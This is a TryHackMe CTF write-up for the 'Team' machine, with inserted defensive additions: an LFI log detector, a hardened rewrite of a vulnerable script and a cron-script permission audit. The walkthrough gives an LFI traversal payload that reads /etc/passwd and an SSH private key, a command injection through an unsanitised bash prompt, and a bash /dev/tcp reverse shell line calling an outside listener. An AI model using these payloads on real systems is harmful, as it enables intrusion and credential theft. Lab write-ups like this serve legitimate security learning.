Team — TryHackMe

Team THM

This is the write-up for the beginner-friendly boot2root machine from TryHackMe named Team. The room is available here: https://tryhackme.com/room/teamcw

The task is simple: get both the user and root flags. So, as always, let’s begin enumeration of the box with Nmap.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.167.14

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:14 EST
Nmap scan report for 10.10.167.14
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 108.33 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:26 EST
Nmap scan report for 10.10.167.14
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 5.4 (85%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 62.32 ms 10.8.0.1
2 61.12 ms 10.10.167.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds

So we have 3 ports open. Port 21 is running FTP with vsftpd 3.0.3. A quick searchsploit on this version does not show any known vulnerabilities, and anonymous login is not enabled.

Port 22 has OpenSSH 7.6p1 running. This is also a relatively recent version, but user enumeration might be possible. We will keep that in mind and carry on.

Let’s explore port 80. Browsing to the IP address gives us the default Apache2 “It works” page. Did some enumeration here but did not find anything.

Entry in /etc/hosts

After adding an entry to /etc/hosts that maps the target’s IP address to a hostname, we get a new web page at http://team.thm:

10.10.96.20 team.thm

team.thm

Let’s check if we can brute force directories on this web page using ffuf:

FFUF Scan

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://team.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://team.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
scripts [Status: 301, Size: 306, Words: 20, Lines: 10]
index.html [Status: 200, Size: 2966, Words: 140, Lines: 90]
images [Status: 301, Size: 305, Words: 20, Lines: 10]
assets [Status: 301, Size: 305, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 5, Words: 1, Lines: 2]
[Status: 200, Size: 2966, Words: 140, Lines: 90]
.html [Status: 403, Size: 273, Words: 20, Lines: 10]
.php [Status: 403, Size: 273, Words: 20, Lines: 10]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 2181 req/sec :: Duration: [0:14:39] :: Errors: 0 ::

Nothing much here apart from robots.txt. Let’s check it out:

robots.txt

There was no directory named “dale”, so maybe it is a username. Let’s keep it in mind and keep enumerating. The hint mentions a “dev” site and talks about LFI. Update the /etc/hosts file with the following:

10.10.96.20 dev.team.thm team.thm

Replace the IP address with the one you got and browse to http://dev.team.thm

Click the placeholder link:

Tried some LFI payloads here, and this one gave a positive result:

http://dev.team.thm/script.php?page=./../../../etc/passwd

LFI

Ah, we see the user dale; maybe we can access his home directory:

user.txt

Yes we can, and this gives us our user flag.

LFI to RCE

Now that we know we have an LFI vulnerability, I tried to check for Apache log poisoning and SSH log poisoning, but we did not have access to those logs. So I enumerated the files we can access using a few word lists:

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI

LFI-gracefulsecurity-linux.txt from SecLists proved to be fruitful. Captured one request in Burp Suite and sent it to Intruder:

Burp Set Position

Used the same file as the payload list and got an interesting result:

Burp Intruder Attack

We can read the private key for user “dale”. Let’s use it to log in to the target after removing all ‘#’ characters from the key:

chmod 600 id_rsa
ssh -i id_rsa dale@10.10.210.177

ssh login as dale
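As an added example (not part of the original post), here is a small shell filter a defender could run over an Apache access log to flag requests like the ones above: plain or percent-encoded traversal in a parameter, or reads of well-known sensitive files such as /etc/passwd or an id_rsa. The sample log lines are constructed to imitate this traffic; home.php is an assumed file name.

```shell
#!/bin/sh
# Added example, not from the write-up: flag LFI-style requests in an Apache
# access log. Sample lines below are constructed to imitate the traffic above.

# decode_path -> lowercase, then decode the %2e/%2f encodings that hide "../".
decode_path() {
    tr 'A-Z' 'a-z' | sed -e 's/%2e/./g' -e 's|%2f|/|g'
}

# flag_lfi_requests < LOG -> prints "REASON<TAB>line" for each suspicious request.
flag_lfi_requests() {
    while IFS= read -r line; do
        req=$(printf '%s' "$line" | decode_path)
        case "$req" in
            *"../"*) reason="traversal" ;;
            *"/etc/passwd"*|*"/etc/shadow"*|*"id_rsa"*) reason="sensitive-file" ;;
            *) continue ;;
        esac
        printf '%s\t%s\n' "$reason" "$line"
    done
}

# count_lfi_hits < LOG -> number of flagged lines.
count_lfi_hits() {
    flag_lfi_requests | wc -l | tr -d ' '
}

# Constructed sample log (combined format); home.php is an assumed file name.
SAMPLE_LOG='10.8.98.192 - - [05/Mar/2021:15:40:01 -0500] "GET /script.php?page=home.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.8.98.192 - - [05/Mar/2021:15:41:10 -0500] "GET /script.php?page=./../../../etc/passwd HTTP/1.1" 200 2731 "-" "Mozilla/5.0"
10.8.98.192 - - [05/Mar/2021:15:42:05 -0500] "GET /script.php?page=..%2F..%2F..%2Fhome%2Fdale%2F.ssh%2Fid_rsa HTTP/1.1" 200 3326 "-" "Mozilla/5.0"
10.8.98.192 - - [05/Mar/2021:15:43:00 -0500] "GET /images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'

# Run it: printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
```

Pipe a real access log into flag_lfi_requests the same way; a 200 status on a flagged line is the one to look at first, since it means the include succeeded.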

Privilege Escalation

Transfer the Linux Smart Enumeration script to the target and run it:

LSE

So user “dale” can run /home/gyles/admin_checks as user “gyles”. Let’s check what is in this file:

dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash
printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null
date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak
printf "Stats have been backed up\n"

From this script we can see that we can inject commands while running it as user “gyles”, because the user’s input is not sanitized: whatever is typed at the second prompt is stored in $error and then executed directly as a command ($error 2>/dev/null):
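A hardened rewrite of admin_checks, added here as an example and not the file from the room: the answer to the second prompt is compared against the literal word ‘date’ instead of being executed, the name is validated before it is written, and the stats directory is assumed to be /var/stats (overridable through STATS_DIR for testing).

```shell
#!/bin/sh
# Hardened rewrite of admin_checks (added example, not the file from the room).
# The original expanded the second answer as a command ($error 2>/dev/null),
# so anything typed there ran as gyles. Here user input is only ever data.
# Assumption: STATS_DIR defaults to /var/stats and can be overridden for testing.
STATS_DIR="${STATS_DIR:-/var/stats}"

# valid_name STRING -> 0 if it looks like an operator name (no shell metacharacters).
valid_name() {
    [ "${#1}" -le 64 ] && printf '%s' "$1" | grep -Eq '^[A-Za-z0-9._ -]+$'
}

# stamp_for_choice STRING -> prints a timestamp only if the literal word 'date'
# was typed; the input is compared, never executed.
stamp_for_choice() {
    [ "$1" = "date" ] || return 1
    date "+%F-%H-%M"
}

# backup_stats NAME CHOICE -> appends NAME to stats.txt, writes the dated
# backup and prints its path. Returns 2 for a bad name, 3 for a bad choice.
backup_stats() {
    name="$1" choice="$2"
    valid_name "$name" || { echo "invalid name" >&2; return 2; }
    stamp=$(stamp_for_choice "$choice") || { echo "type 'date' to timestamp the file" >&2; return 3; }
    mkdir -p "$STATS_DIR"
    printf '%s\n' "$name" >> "$STATS_DIR/stats.txt"
    cp "$STATS_DIR/stats.txt" "$STATS_DIR/stats-$stamp.bak"
    printf '%s\n' "$STATS_DIR/stats-$stamp.bak"
}

# Interactive entry point mirroring the original prompts. It only runs when
# ADMIN_CHECKS_RUN=1 so the functions can be sourced and tested on their own.
main() {
    printf 'Reading stats.\n'; sleep 1
    printf 'Enter name of person backing up the data: '; read -r name
    printf "Enter 'date' to timestamp the file: "; read -r choice
    backup_stats "$name" "$choice" >/dev/null && printf 'Stats have been backed up\n'
}
if [ "${ADMIN_CHECKS_RUN:-0}" = 1 ]; then main; fi
```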

Command Injection

Upgrade the shell by running:

/usr/bin/script -qc /bin/bash /dev/null

Ran LSE again, but didn’t get anything interesting. Ran pspy to check if anything interesting is running:

pspy

From the above output, /usr/local/bin/main_backup.sh is running as root (UID=0), and user “gyles” can edit the script because he belongs to the “admin” group:
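An added example, not from the write-up: a small audit a defender could run against any script that root executes from cron, as main_backup.sh was here. A script run as root should be owned by root and be writable by nobody else, and its directory should not be writable either. It assumes ls -ld prints the usual “perms links owner group …” fields; the expected owner is a parameter so the same check can be run against admin_checks with gyles.

```shell
#!/bin/sh
# Added example, not from the write-up: audit a script that root executes from
# cron, as main_backup.sh was here. It must be owned by root and be writable by
# nobody else; group write for "admin" was the flaw on this box.
# Assumption: 'ls -ld' prints "perms links owner group ..." (GNU and BSD do).

# writable_by_others PATH -> 0 if the group or other write bit is set.
writable_by_others() {
    set -- $(ls -ld "$1")
    case "$1" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# path_owner PATH -> prints the owning user name.
path_owner() {
    set -- $(ls -ld "$1")
    printf '%s\n' "$3"
}

# audit_root_script FILE [EXPECTED_OWNER]
# Prints one finding per line; returns 1 if the script is unsafe to run as root.
audit_root_script() {
    file="$1" want="${2:-root}" bad=0
    if [ ! -f "$file" ]; then
        echo "MISSING $file"; return 1
    fi
    owner=$(path_owner "$file")
    if [ "$owner" != "$want" ]; then
        echo "OWNER   $file is owned by $owner, expected $want"; bad=1
    fi
    if writable_by_others "$file"; then
        echo "WRITE   $file is group- or world-writable: its editors get root"; bad=1
    fi
    dir=$(dirname "$file")
    if writable_by_others "$dir"; then
        echo "DIR     $dir is group- or world-writable: the script can be swapped"; bad=1
    fi
    [ "$bad" -eq 0 ] && echo "OK      $file"
    return "$bad"
}

# Against the paths from the write-up:
#   audit_root_script /usr/local/bin/main_backup.sh
#   audit_root_script /home/gyles/admin_checks gyles
```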

User Group

Let’s put a reverse shell line into this script and also start a netcat listener:

bash -i >& /dev/tcp/10.8.98.192/9999 0>&1

Reverse Shell

And after a minute or so:

root.txt

That’s it. We are root. Thanks for reading.

P.S. User dale is a member of the “lxd” group. There is a possible way to get root if a user is a member of the “lxd” group. I haven’t tried that yet, but will look at that later.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900